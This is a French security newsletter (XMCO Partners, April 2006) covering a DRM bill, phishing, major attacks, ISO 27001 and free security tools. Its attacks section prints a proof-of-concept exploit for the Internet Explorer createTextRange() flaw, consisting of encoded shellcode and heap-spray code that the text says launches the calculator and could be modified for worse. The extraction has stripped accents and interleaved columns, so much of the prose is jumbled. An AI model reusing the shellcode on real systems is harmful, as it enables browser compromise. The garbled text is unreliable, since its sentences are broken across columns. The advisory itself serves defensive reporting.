Professional Documents
Culture Documents
AVRIL 2006
LActu Scurit n2
Internet: le fourre-tout de linformation.
Le problme auquel nous som-
PLAN mes confronts aujourdhui est que
ces moyens de communication sont
POINT JURIDIQUE aussi utiliss dans le cadre de len-
Projet de loi relatif au Droit treprise, qui, par nature, a besoin de
dAuteur et aux Droits Voisins matriser son environnement.
dans la Socit de lInformation. Les menaces pullulent. Dsor-
mais, moins dune minute suffit
(page 2)
infecter un poste connect sans pro-
tection sur Internet.
Comment rendre Internet com-
NOUVELLE TENDANCE patible avec les entreprises? De
Le phishing, une attaque de plus nombreux moyens existentet ont t
en plus utilise par les pirates. implments au fil du temps au sein
(page 4) des rseaux dentreprise : firewalls,
anti-virus, systmes de dtection
dintrusion (IDS), etc.
Une menace nanmoins subsis-
ATTAQUES ET ALERTES te: comment grer le contenu du
MAJEURES Web? Comment vrifier quun
Description et analyse des atta- contentieux avec un client mcon-
ques et menaces les plus impor- >1997: Internet colonise massive- tent ne prenne pas de proportions
ment les entreprises. inquitantes? Comment garantir
tantes parues durant le mois de
>2002: LADSL fait ses dbuts. quaucun collaborateur ne publie
Mars.
>2004: Le haut dbit envahit les dinformations confidentielles par-
(page 6) foyers franais. tir de son email professionnel?
>2006: Lexplosion dInternet rend Comment lutter contre la dsinfor-
sa matrise dlicate. mation?
VOLUTION NORMES ET En un mot: comment raliser la
STANDARDS Il aura fallu 10 ans pour quIn- revue de presse de lInternet?
Prsentation de la norme de ternet soit peru comme la troisime Le gigantisme de la tche pose de
scurit certifiante ISO27001 rvolution industrielle. Contraire- nombreux problmes pratiques,
ment aux deux prcdentes, celle-ci auxquels sont rgulirement con-
(BS7799-2). fronts les entreprises. Tout le
sest impose sans aucun mode
(page 10) demploi. monde savoue un peu dpass par
Mme les spcialistes sy perdent: lampleur du phnomne qui sauto-
forums, blogs, Instant messaging, alimente.
OUTILS LIBRES mailing-list, newsgroups, mails, VoIP De plus en plus dobservateurs
Dcouvrez et suivez les volu- sont autant de nouveaux moyens de voient en Internet une crature dont
tions des outils libres les plus communiquer et dchanger. Cha- le contrle aurait chapp son
cun dispose de ses propres codes, de crateur.
utiles et efficaces. Pourtant, il existe certainement
ses spcificits. Ces outils sont mis
(page 13) la disposition de profanes. des moyens de limiter les risques.
De fait, tout devient per- Cest en tout cas ce quesprent les
misPuisquil est si facile de crer responsables de scurit et les servi-
son propre blog, puisquil est grisant ces de communications
de savoir que ses confidences les plus Nous avons donc dcid de relever
intimes seront parcourues par des ce dfi aux cts de nos clients afin
milliards de lecteurs potentiels, de trouver des solutions. Je vous ferai
pourquoi ne pas se laisser emporter part prochainement de lavancement
dans cette euphorie collective? de nos travaux.
Pourquoi ne pas prendre le TGV de Marc Behar
linformation?
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 1
www.xmcopartners.com
LA SCURIT INFORMATIQUE
AVRIL 2006
1. POINT JURIDIQUE:
XMCO | Partners
Petit rappel ou GDN (Gestion de Droits Num- Une license tait alors propre un
Les divers sujets et amen- riques). ordinateur et paye mensuellement
dements de cette loi : par les internautes.
Cette technique avait pour but
Le but initial des industriels dans de restreindre la diffusion par copie Ds lors, de nombreux oppo-
l'adoption de cette loi, tait dtu- des contenus numriques tout en sants, dont lAlliance Public-Artistes
dier et de mettre en place sur les grant les droits dauteur et les mar- et les partisans du logiciel libre, ont
uvres protgesdes dispositifs: ques dposes. fait part de leur mcontentement. Ils
Une architecture fut mme tudie estimaient que le gouvernement
danti-copie qui interdit la re- afin de permettre lapplication de ce devait retirer ce texte qui allait
production dune uvre protge. projet. lencontre des liberts individuelles.
danti-usagequi permet de ne Le principe tait le suivant: un ser-
veur stockait les fichiers protgs par
lire certains fichiers qu partir de
droit dauteur et le client possdait
certains logiciels ou matriels (ba-
un logiciel capable de consulter ces
ladeur).
d'identification de l'utilisateur
fichiers (lecteur multimdia, MP3
).
qui autorise la lecture aux utilisa- Un utilisateur qui souhaitait tl-
teurs identifis possesseurs dune charger un fichier devait fournir un
license. identifiant unique au serveur. Le
de tatouage de l'uvre qui per-
serveur envoyait alors le fichier chif-
met de tracer luvre, de la redis- fr demand spcialement pour ce
tribuer et den interdire la lecture client. Enfin, lorsque lutilisateur
au del dune date prdfinie. voulait consulter ce fichier tlchar-
de traage de l'usage qui enre-
g (par Internet), le lecteur tablissait
gistre la transmission d'informa- une connexion avec le serveur qui
tions via internet vers un serveur sassurait que lutilisateur possde
industriel chaque utilisation bien une license valide linstant
d'une uvre. prsent. Si ctait le cas, le lecteur
pouvait alors dchiffrer le fichier et
Les promoteurs ont donc, la le lire.
fin du mois de dcembre, prsent
ce projet qui vise protger les
DRM (Digital Rights Management)
XMCO PARTNERS - CABINET DE CONSEIL EN SCURIT DES SYSTMES DINFORMATION 2
www.xmcopartners.com
LA SCURIT INFORMATIQUE
AVRIL 2006
2. NOUVELLE TENDANCE :
LE PHISHING, UNE ATTAQUE DE PLUS
EN PLUS UTILISE PAR LES PIRATES.
XMCO | Partners
Longtemps mal traduits dans leur langue, les franais The Phishing Incident Reporting & Termination Squad
pouvaient facilement identifier les emails malveillants. PhishRegistry.org
Dsormais, les emails malicieux sont trs bien crits et les
sites associs reproduisent parfaitement les sites des ban- Ces deux sites permettent de grer ce genre dincident. Ils
ques victimes. reportent lattaque auprs des autorits et alertent les
clients enregistrs en cas de tentative de phishing.
Les pirates utilisent plusieurs techniques de contour-
nement des filtres antispam et des filtres antiphishing. Le Voici leur adresse respective :
texte rdig est, en fait, une image accompagne d'un http://www.phishregistry.org/
texte et d'un titre variable cach dans le code source du http://castlecops.com/modules.php?name=Fried_Phish
message. Les filtres bass sur l'analyse du texte sont ainsi
tromps.
n1142854718 (BNP)
n 1142930896 (Socit Gnrale) Site officiel
n1142963045 (Crdit Lyonnais).
3. ATTAQUES MAJEURES :
TOP 5 DU MOIS DE MARS
XMCO | Partners
Aucun programme malveillant qui exploite cette faille Plusieurs programmes malveillants ont t publis. Une
n'est actuellement disponible sur Internet. Cependant, des simple visite du site qui contient la page HTML malfor-
pistes ont t dvoiles. Il est probable que diffrentes me permet lexploitation de la vulnrabilit.
preuves de concept verront le jour prochainement.
Le programme le plus malicieux cr ce jour, permet
Programmes vulnrables: uniquement de lancer la calculatrice. Lexploit prsent
Microsoft Office 2000 SP 3 ci-dessous gnre ces pages HTML utilises pour piger
Microsoft Office XP SP 1 / 2/ 3 les victimes. Notons que cette version inoffensive peut tre
Microsoft Works Suites aisment modifie par un pirate afin dexcuter des ac-
Microsoft Office X pour Mac tions plus prjudiciables.
Microsoft Office 2004
Criticit : Eleve
Rfrence Xmco: n 1142413618
KB917077
Excution de code distance et Dni de
service via Internet Explorer (createTex-
tRange())
shellcode = unescape(
"%u9090%u9090%u9090%uC929%uE983%uD9DB%uD
9EE%u2474"+"%u5BF4%u7381%uA913%u4A67%u83C
C%uFCEB%uF4E2%u8F55"+"%uCC0C%u67A9%u89C1
%uEC95%uC936%u66D1%u47A5%u7FE6"+"%u93C1%
u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69 1. Laffectation du code malicieux la variable
"+"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u shellcode. Ce code sera excut lors de louver-
9871%u638D"+"%u2F3F%u3822%uCD6E%u0142%uC0 ture de la page. Dans notre cas nous lancerons
C1%uECE2%uD015%u8CA8"+"%uD0C1%u6622%u45A la calculatrice de Windows.
1%u43F5%u0F4E%uA798%u472E%u57E9"+"%u0CCF%
u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C
40"+"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uEC
A9%uF022%u56F6"+"%uACBC%u8CFF%uA447%uBFD
7%uBFA8%uFFC1%u46B4%u30A7"+"%u2BB5%u8941%
u33B5%u0456%uA02B%u49CA%uB42F%u67CC"
+"%uCC4A%uD0FF");
bigblock = unescape("%u9090%u9090");
slackspace = 20 + shellcode.length
block =
bigblock.substring(0,bigblock.length-slackspace);
</script>
Criticit : Eleve
Rfrence Xmco:
n1142333841(Correctif)
n1142332433(Exploit)
Criticit : Eleve
Rfrence Xmco: n 1142437567
4. EVOLUTION
DE NORMES :
Les normes lies la scurit informa-
tique voluent continuellement et
donnent naissance la premire certi-
fication dans le domaine. Les acteurs
financiers, les clients et les partenaires
des grandes entreprises accueillent
cette nouvelle avec un grand intrt car
elle reprsente une garantie suppl-
mentaire.
XMCO | Partners
La naissance dune norme de scu- La norme anglaise BS 7799 est La norme ISO 17799 se compose de
rit de linformation. lorigine de cette norme ISO. 10 chapitres. De nombreux points
Les normes ISO 17799 et Cre en 1995 par le British Stan-
importants y sont abords:
ISO27001 (BS7799-2) dard Institute (quivalent de
lAFNOR en France), cette norme
instaure des standards de qualit et 3 chapitres sont ddis au ma-
Les normes ISO sont, depuis prs de performance pour lindustrie. En nagement de la scurit des infor-
de 10 ans, la rfrence en matire de 1999, elle connat un succs inter- mations (les politiques de scurit,
scurit. Un grand nombre dentre- national et est adopte en tant que lorganisation, la classification et le
prises tournes vers lexportation et ISO/IEC 17799:V2000. Seuls des contrle).
linternational ont ressenti la nces- pratiques et des contrles sont dic- 2 chapitres sur la scurit du
sit dtablir des rfrentiels mon- ts par ce texte. Aucune rfrence personnel (contrle lors du recru-
diaux de scurit. Ceci afin dtablir une quelconque certification ny est tement, formation et sensibilisa-
un climat de confiance auprs des mentionne. tion) et sur la scurit physique
clients et des partenaires mfiants. (quipements et primtre de scu-
Les normes ISO sont apparues. Elles Un an plus tard, une rvision sera rit).
sont dsormais gres par une Or- effectue afin duniformiser lenvi- 5 chapitres sur le dveloppement
ganisation non gouvernementale qui ronnement de la scurit informati- de lexploitation des systmes
fdre des organismes nationaux et que. Elle aboutira, en mars 2005, dinformation (contrles daccs,
s'occupe d'dicter des normes inter- la version 2 de la norme ISO 17799. dveloppement et maintenance des
nationales. Concrtement, lISO 17799 se dis- systmes, gestion de la continui-
tingue par sa reconnaissance et sa t).
Il est important de connatre les diffusion mondiale auprs des plus
diffrents standards qui dfinissent grands comptes. Cependant, elle
les normes de certification d'une ne dfinit aucune exigence (mat- Chaque chapitre est
organisation en scurit des systmes rielle ou logicielle) et est, de ce fait, articul autour de
d'informations. Cest pourquoi nous remise en question. Elle est donc plusieurs points: les
expliquerons les grandes lignes des cense donner une certification v- objectifs, les mesures
normes ISO17799 et ISO27001 ritable avec la version BS 7799-2. mettre en uvre, les
(BS7799-2). Ces dernires ont t
recommandations et les contrles
mises en place pour prciser les
effectuer.
mesures et les mthodes de mana-
LISO 17799 est donc une sorte
gement dun systme dinformation.
dinventaire des bonnes pratiques et
des points importants vrifier au
Lvolution de BS7799 lISO sein dun systme dinformation.
17799.
La norme ISO 17799
En octobre 2005, le standard BS 7799-2 est adopt par l'ISO. Il introduit le nouveau standard international ISO/IEC
27001:2005.
Plus quun simple guide la version BS7799-2 soccupe, quant elle, de prsenter et de dfinir les mthodes appli-
quer pour assurer une bonne gestion de la scurit. Elle ne sassure pas de lefficacit des moyens mis en uvre mais de
lexistence relle de ceux-ci. Une dmarche PDCA (Plan, Do, Check, Act) galement appele roue de Deming prcise
les tapes de lapplication des mesures de scurit (voir schma ci-dessous).
Depuis Mars 2005, la certification BS7799-2 est enfin possible. Elle garantit quune entreprise a mis tous les moyens
en place pour matriser son systme dinformation. Elle assure ainsi une crdibilit et une confiance certaine auprs des
clients.
Celle-ci est base sur deux tapes: une tude de la documentation de lentreprise audite et une vrification de la
gestion mis en uvre afin dassurer la scurit du systme.
Les entreprises qui adoptent l'ISO 27001 sont libres de choisir les contrles spcifiques adapts aux besoins et aux risques
de chacun. Prs de 1800 socits ont ainsi t certifies au standard BS 7799 part 2 (ou les quivalents nationaux). Ce
besoin se dveloppe considrablement.
A noter, que cette certification n'est pas impose comme la loi Sarbannes-Oxley (voir numro 1 du mois de Mars d'Actu
Scurit"). Cependant, les partenaires et les clients sont de plus en plus attentifs ces normes car elles sont sources de
crdibilit.
La certification est importante dans une entreprise car elle donne une dimension sure et internationale. Toute certi-
fication se dfinie comme une mthode qui atteste, par l'intermdiaire d'une vrification indpendante et neutre, qu'un
systme rpond aux normes de qualit.
Malgr lengouement pour ces certifications, peu dorganismes franais permettent de certifier BS7799-2 (LSTI est
le principal acteur dans ce domaine).
Promisec Spectator surveille votre parc Windows sans quelques clics tre dtects puis rassembls dans un ta-
agent. bleau qui pourra tre export sous forme de rapport.
Identifier les machines non con-
Toutes les menaces peuvent tre dtectes. Cependant,
formes et surveiller lapplication il est galement possible de les radiquer en quelques clics
de votre politique de scurit. partir de la mme solution logicielle.
Plusieurs analyses peuvent tre excutes simultanment.
Avec la mise en place de diverses certifications En effet, de nombreuses configurations spcifiques peu-
(ISO127001) et daudits de scurit en rapport avec la loi vent tre dfinies et lances de manire indpendante.
Sarbannes-Oxley (voir article sur ce sujet dans Actu-Se-
curit de Mars 2006), les RSSI doivent trouver des so- Lanalyse est effectue partir dun unique poste.
lutions appropries afin de vrifier la bonne application Loutil peut intervenir directement sur la base de registre
de leur politique de scurit. du poste distant. Dans le cas o une valeur serait non
Malheureusement, le problme majeur rside dans ce conforme, il est possible de forcer lapplication de la poli-
contrle et dans lanalyse de parcs informatiques impor- tique de scurit en modifiant cette valeur.
tants.
Ci-dessous, une capture dcran vous montre comment
Comment contrler rapidement et efficacement lappli- dfinir une clef de registre analyser. Ici, nous souhaitons
cation de cette politique? vrifier si les crans de veille sont protgs par un mot de
passe.
Lesutilisateurs de votre rseaux utilisent-ils des logiciels
de messagerie instantane, des clefs USB personnelles
ou encore des modems?
5. OUTILS LIBRES :
FOCUS SUR 5 PRODUITS LIBRES
Chaque mois, nous vous prsentons les outils libres qui nous paraissent indispensables. Les logiciels abords sont varis:
utilitaire de scurit et autres programmes ncessaires au sein dune entreprise.
Pour notre second numro, nous avons choisi danalyser des logiciels Internet, un client ssh et deux outils de scurit:
ClamAV et ClamWin: Antivirus libre et adpatables sous Unix et Windows
Firefox: devenu aussi clbre que IE est un Navigateur lger, efficace et pratique
Putty: Client SSH lger et ddi a Windows
SpamAssasin : Utilitaire de gestion de spams
Thunderbird : Client mail capable de rpondre tous vos besoins
Vous trouverez la fin de cette section un tableau rcapitulatif des versions de tous les logiciels prsents lors des prc-
dents numros dActu Scurit.
XMCO |Partners
ClamAntivirus
Antivirus
Version actuelle ClamAV et ClamWin 0.88
Utilit
Scurit de loutil Plusieurs failles ont t rapportes mais sont rapidement corriges grce la
participation de la communaut du libre:
http://secunia.com/product/2538/
Avis XMCO ClamAv est un outil libre qui s'avre particulirement efficace lorsqu'il est coupl
avec des logiciels comme Amavis et Dansguardian qui proposent des fonctionnalits
adaptes ClamAV. Ainsi cet antivirus peut devenir efficace sur des relais de messa-
gerie et rivaliser avec les principaux concurrents du march. Enfin la communaut
de dveloppeurs est trs ractive.
Firefox
Navigateur Internet
Version actuelle version 1.5, une version beta 2.0 est galement disponible
Utilit
Tlchargement http://www.mozilla-europe.org/fr/products/firefox/
Scurit de loutil Comme tout logiciel utilis chaque jour par des millions de personnes, Fi-
refox souffre de nombreuses vulnrabilits dcouvertes chaque mois. Le
navigateur Internet tant le principal vecteur dexploitation dattaques di-
verses, les attaquants se focalisent plus particulirement sur ces utilitaires.
La liste des failles identifies est disponible ladresse ci-dessous:
http://secunia.com/product/4227/
Avis XMCO Firefox est un navigateur web qui doit tre diffus largement en entreprise. En effet,
ce logiciel n'a rien envier Internet Explorer et est moins touch par la publication
de vulnrabilits. Ce client web est donc une alternative simple et efficace.
Putty
Client SSH
Version actuelle Putty 0.58
Type Outil SSH, Telnet et Rlogin pour Windows
Utilit
Description Putty est un utilitaire indispensable pour les connexions SSH sous Windows.
Cest un des seuls outils pour le systme dexploitation de Microsoft per-
mettant de se connecter distance des serveurs en utilisant les protocoles
SSH. LIP des diffrents serveurs peut tre enregistre et toutes les options
sont configurables (couleurs, polices de caractres,). Il est galement pos-
sible de choisir entre SSH1 et SSH2, dutiliser le mode passif pour les ngo-
ciations Telnet ...
Cet outil est disponible pour tous les systmes Windows95, 98, ME, NT,
2000 et XP.
Capture dcran
Tlchargement http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
Scurit de loutil Peu de failles ont t rapportes et ont causs des dnis de service
La liste des vulnrabilits est disponible ladresse ci-dessous:
http://secunia.com/product/4506/
Avis XMCO Putty est un client SSH efficace. De plus, la fonctionnalit de tunnel permet de crer
des VPN partir d'un serveur SSH. Cet outil lger et libre est donc un outil simple
adopter.
Spamassasin
Dispositif de filtre de spams
Version actuelle SpamAssassin 3.1.1
Utilit
Scurit de loutil Peu de failles ont t rapportes et ont principalement causs des dnis de
service. La liste des vulnrabilits est disponible ladresse ci-dessous:
http://secunia.com/product/4506/
Avis XMCO Spamassassin est un outil tout aussi performant que la plupart des logiciels commer-
ciaux. De plus, la configuration et l'implmentation sont simples et rapides.
Thunderbird
Gestionnaire de mails et flux RSS
Version actuelle Thunderbird 1.5
Utilit
Tlchargement http://www.mozilla-europe.org/fr/products/thunderbird/
Scurit de loutil Quelques failles ont t reportes mais sont rapidement corriges par les
dveloppeurs. La liste des vulnrabilits de Thunderbird est disponible
ladresse ci-dessous:
http://secunia.com/product/4652/
Avis XMCO Thunderbird est un mailer complet qui est indispensable pour un client final. Il ap-
porte la simplicit et les fonctions des clients mails les plus avancs mais n'est pas un
groupware comme Exchange ou Lotus Notes.